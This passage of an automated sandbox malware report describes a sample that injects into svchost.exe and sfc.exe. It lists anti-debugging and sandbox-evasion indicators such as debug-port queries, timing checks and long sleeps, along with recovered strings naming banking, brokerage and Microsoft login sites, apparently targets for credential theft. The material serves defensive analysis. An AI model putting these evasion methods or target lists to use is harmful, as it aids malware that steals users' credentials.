                Source: Binary string: wntdll.pdb source: g1V10ssekg.exe, 00000000.00000003.881610884.0000000003F60000.00000004.00001000.00020000.00000000.sdmp, g1V10ssekg.exe, 00000000.00000003.884102443.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1066771274.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1162222620.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1068700855.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1162222620.000000000319E000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, sfc.exe, 00000003.00000002.3333862517.00000000037EE000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000003.00000003.1162413276.00000000032EA000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000003.00000002.3333862517.0000000003650000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000003.00000003.1166837840.000000000349E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sfc.pdb source: svchost.exe, 00000001.00000003.1129735193.000000000081B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1129821798.0000000000824000.00000004.00000020.00020000.00000000.sdmp, 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000002.00000002.3332576925.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sfc.pdbGCTL source: svchost.exe, 00000001.00000003.1129735193.000000000081B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1129821798.0000000000824000.00000004.00000020.00020000.00000000.sdmp, 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000002.00000002.3332576925.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000002.00000002.3332001173.00000000001EF000.00000002.00000001.01000000.00000004.sdmp, 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000005.00000000.1234240914.00000000001EF000.00000002.00000001.01000000.00000004.sdmp
                Source: g1V10ssekg.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: g1V10ssekg.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: g1V10ssekg.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: g1V10ssekg.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: g1V10ssekg.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_000D4B37 LoadLibraryA,GetProcAddress,0_2_000D4B37
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_0013848F push FFFFFF8Bh; iretd 0_2_00138491
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_000F8945 push ecx; ret 0_2_000F8958
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00325048 push es; retf 1_2_00325049
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0031D89C pushfd ; ret 1_2_0031D89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00311A83 pushfd ; iretd 1_2_00311A84
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003182CC push edi; ret 1_2_003182CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00313440 push eax; ret 1_2_00313442
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0031AD15 push es; retf 1_2_0031AD1B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0031D572 push cs; retf 1_2_0031D573
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00321D54 push es; ret 1_2_00321D5F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0031D5F4 push esp; retf 1_2_0031D603
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003277A3 push eax; iretd 1_2_003277A4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00321FE3 push esi; iretd 1_2_00321FEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00321FD4 push esi; iretd 1_2_00321FEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300225F pushad ; ret 1_2_030027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030027FA pushad ; ret 1_2_030027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030309AD push ecx; mov dword ptr [esp], ecx1_2_030309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300283D push eax; iretd 1_2_03002858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300135E push eax; iretd 1_2_03001369
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_0365225F pushad ; ret 3_2_036527F9
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036527FA pushad ; ret 3_2_036527F9
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_036809AD push ecx; mov dword ptr [esp], ecx3_2_036809B6
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_0365283D push eax; iretd 3_2_03652858
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_0365135E push eax; iretd 3_2_03651369
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_00BA6224 push eax; iretd 3_2_00BA6258
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_00BA4360 push eax; iretd 3_2_00BA4361
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_00B9E911 push es; ret 3_2_00B9E91C
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_00B9EBA0 push esi; iretd 3_2_00B9EBAB
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_00B9EB91 push esi; iretd 3_2_00B9EBAB
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_00B94E89 push edi; ret 3_2_00B94E8A
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_00BA52F8 push esp; ret 3_2_00BA52FD
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_00155376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00155376
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_000F3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_000F3187
                Source: C:\Users\user\Desktop\g1V10ssekg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\g1V10ssekg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\g1V10ssekg.exeAPI/Special instruction interceptor: Address: 2053214
                Source: C:\Windows\SysWOW64\sfc.exeAPI/Special instruction interceptor: Address: 7FFA424ED324
                Source: C:\Windows\SysWOW64\sfc.exeAPI/Special instruction interceptor: Address: 7FFA424ED7E4
                Source: C:\Windows\SysWOW64\sfc.exeAPI/Special instruction interceptor: Address: 7FFA424ED944
                Source: C:\Windows\SysWOW64\sfc.exeAPI/Special instruction interceptor: Address: 7FFA424ED504
                Source: C:\Windows\SysWOW64\sfc.exeAPI/Special instruction interceptor: Address: 7FFA424ED544
                Source: C:\Windows\SysWOW64\sfc.exeAPI/Special instruction interceptor: Address: 7FFA424ED1E4
                Source: C:\Windows\SysWOW64\sfc.exeAPI/Special instruction interceptor: Address: 7FFA424F0154
                Source: C:\Windows\SysWOW64\sfc.exeAPI/Special instruction interceptor: Address: 7FFA424EDA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031021AE rdtsc 1_2_031021AE
                Source: C:\Windows\SysWOW64\sfc.exeWindow / User API: threadDelayed 1546Jump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeWindow / User API: threadDelayed 8427Jump to behavior
                Source: C:\Users\user\Desktop\g1V10ssekg.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-101848
                Source: C:\Users\user\Desktop\g1V10ssekg.exeAPI coverage: 5.5 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\sfc.exeAPI coverage: 2.9 %
                Source: C:\Windows\SysWOW64\sfc.exe TID: 5272Thread sleep count: 1546 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\sfc.exe TID: 5272Thread sleep time: -3092000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exe TID: 5272Thread sleep count: 8427 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\sfc.exe TID: 5272Thread sleep time: -16854000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exe TID: 804Thread sleep time: -90000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exe TID: 804Thread sleep count: 44 > 30Jump to behavior
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exe TID: 804Thread sleep time: -44000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\5JxkCj4eQRzcmUJqY16X4Zy.exe TID: 804Thread sleep time: -39000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\sfc.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_0013445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0013445A
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_0013C6D1 FindFirstFileW,FindClose,0_2_0013C6D1
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_0013C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0013C75C
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_0013F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0013F3F3
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_001337EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_001337EF
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_00133B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00133B12
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_00BAC9A0 FindFirstFileW,FindNextFileW,FindClose,3_2_00BAC9A0
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_000D49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_000D49A0
                Source: p46Q44o9.3.drBinary or memory string: dev.azure.comVMware20,11696497155j
                Source: p46Q44o9.3.drBinary or memory string: global block list test formVMware20,11696497155
                Source: p46Q44o9.3.drBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                Source: p46Q44o9.3.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                Source: sfc.exe, 00000003.00000002.3332463262.0000000002F75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllh#K
                Source: p46Q44o9.3.drBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                Source: p46Q44o9.3.drBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                Source: p46Q44o9.3.drBinary or memory string: tasks.office.comVMware20,11696497155o
                Source: p46Q44o9.3.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                Source: 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000005.00000002.3333117945.0000000001179000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla
                Source: p46Q44o9.3.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                Source: firefox.exe, 0000000C.00000002.1462469403.000001636DDEC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: p46Q44o9.3.drBinary or memory string: bankofamerica.comVMware20,11696497155x
                Source: p46Q44o9.3.drBinary or memory string: ms.portal.azure.comVMware20,11696497155
                Source: p46Q44o9.3.drBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                Source: p46Q44o9.3.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                Source: p46Q44o9.3.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                Source: p46Q44o9.3.drBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                Source: p46Q44o9.3.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                Source: p46Q44o9.3.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                Source: p46Q44o9.3.drBinary or memory string: interactivebrokers.comVMware20,11696497155
                Source: p46Q44o9.3.drBinary or memory string: AMC password management pageVMware20,11696497155
                Source: p46Q44o9.3.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                Source: p46Q44o9.3.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                Source: p46Q44o9.3.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                Source: p46Q44o9.3.drBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                Source: p46Q44o9.3.drBinary or memory string: discord.comVMware20,11696497155f
                Source: p46Q44o9.3.drBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                Source: p46Q44o9.3.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                Source: p46Q44o9.3.drBinary or memory string: outlook.office365.comVMware20,11696497155t
                Source: p46Q44o9.3.drBinary or memory string: outlook.office.comVMware20,11696497155s
                Source: p46Q44o9.3.drBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                Source: p46Q44o9.3.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                Source: p46Q44o9.3.drBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\sfc.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031021AE rdtsc 1_2_031021AE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00327D23 LdrLoadDll,1_2_00327D23
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_00143F09 BlockInput,0_2_00143F09
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_000D3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_000D3B3A
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_00105A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00105A7C
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_000D4B37 LoadLibraryA,GetProcAddress,0_2_000D4B37
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_02053480 mov eax, dword ptr fs:[00000030h]0_2_02053480
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_020534E0 mov eax, dword ptr fs:[00000030h]0_2_020534E0
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_02051E70 mov eax, dword ptr fs:[00000030h]0_2_02051E70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A30B mov eax, dword ptr fs:[00000030h]1_2_0306A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A30B mov eax, dword ptr fs:[00000030h]1_2_0306A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A30B mov eax, dword ptr fs:[00000030h]1_2_0306A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302C310 mov ecx, dword ptr fs:[00000030h]1_2_0302C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03050310 mov ecx, dword ptr fs:[00000030h]1_2_03050310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03108324 mov eax, dword ptr fs:[00000030h]1_2_03108324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03108324 mov ecx, dword ptr fs:[00000030h]1_2_03108324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03108324 mov eax, dword ptr fs:[00000030h]1_2_03108324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03108324 mov eax, dword ptr fs:[00000030h]1_2_03108324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]1_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]1_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]1_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B035C mov ecx, dword ptr fs:[00000030h]1_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]1_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]1_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FA352 mov eax, dword ptr fs:[00000030h]1_2_030FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D8350 mov ecx, dword ptr fs:[00000030h]1_2_030D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0310634F mov eax, dword ptr fs:[00000030h]1_2_0310634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D437C mov eax, dword ptr fs:[00000030h]1_2_030D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305438F mov eax, dword ptr fs:[00000030h]1_2_0305438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305438F mov eax, dword ptr fs:[00000030h]1_2_0305438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302E388 mov eax, dword ptr fs:[00000030h]1_2_0302E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302E388 mov eax, dword ptr fs:[00000030h]1_2_0302E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302E388 mov eax, dword ptr fs:[00000030h]1_2_0302E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03028397 mov eax, dword ptr fs:[00000030h]1_2_03028397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03028397 mov eax, dword ptr fs:[00000030h]1_2_03028397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03028397 mov eax, dword ptr fs:[00000030h]1_2_03028397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EC3CD mov eax, dword ptr fs:[00000030h]1_2_030EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]1_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]1_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]1_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]1_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]1_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]1_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h]1_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h]1_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h]1_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h]1_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B63C0 mov eax, dword ptr fs:[00000030h]1_2_030B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE3DB mov eax, dword ptr fs:[00000030h]1_2_030DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE3DB mov eax, dword ptr fs:[00000030h]1_2_030DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE3DB mov ecx, dword ptr fs:[00000030h]1_2_030DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DE3DB mov eax, dword ptr fs:[00000030h]1_2_030DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D43D4 mov eax, dword ptr fs:[00000030h]1_2_030D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D43D4 mov eax, dword ptr fs:[00000030h]1_2_030D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E3F0 mov eax, dword ptr fs:[00000030h]1_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E3F0 mov eax, dword ptr fs:[00000030h]1_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E3F0 mov eax, dword ptr fs:[00000030h]1_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030663FF mov eax, dword ptr fs:[00000030h]1_2_030663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302823B mov eax, dword ptr fs:[00000030h]1_2_0302823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B8243 mov eax, dword ptr fs:[00000030h]1_2_030B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B8243 mov ecx, dword ptr fs:[00000030h]1_2_030B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0310625D mov eax, dword ptr fs:[00000030h]1_2_0310625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A250 mov eax, dword ptr fs:[00000030h]1_2_0302A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036259 mov eax, dword ptr fs:[00000030h]1_2_03036259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EA250 mov eax, dword ptr fs:[00000030h]1_2_030EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EA250 mov eax, dword ptr fs:[00000030h]1_2_030EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034260 mov eax, dword ptr fs:[00000030h]1_2_03034260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034260 mov eax, dword ptr fs:[00000030h]1_2_03034260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034260 mov eax, dword ptr fs:[00000030h]1_2_03034260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302826B mov eax, dword ptr fs:[00000030h]1_2_0302826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E284 mov eax, dword ptr fs:[00000030h]1_2_0306E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E284 mov eax, dword ptr fs:[00000030h]1_2_0306E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B0283 mov eax, dword ptr fs:[00000030h]1_2_030B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B0283 mov eax, dword ptr fs:[00000030h]1_2_030B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B0283 mov eax, dword ptr fs:[00000030h]1_2_030B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030402A0 mov eax, dword ptr fs:[00000030h]1_2_030402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030402A0 mov eax, dword ptr fs:[00000030h]1_2_030402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]1_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C62A0 mov ecx, dword ptr fs:[00000030h]1_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]1_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]1_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]1_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]1_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]1_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]1_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]1_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]1_2_0303A2C3
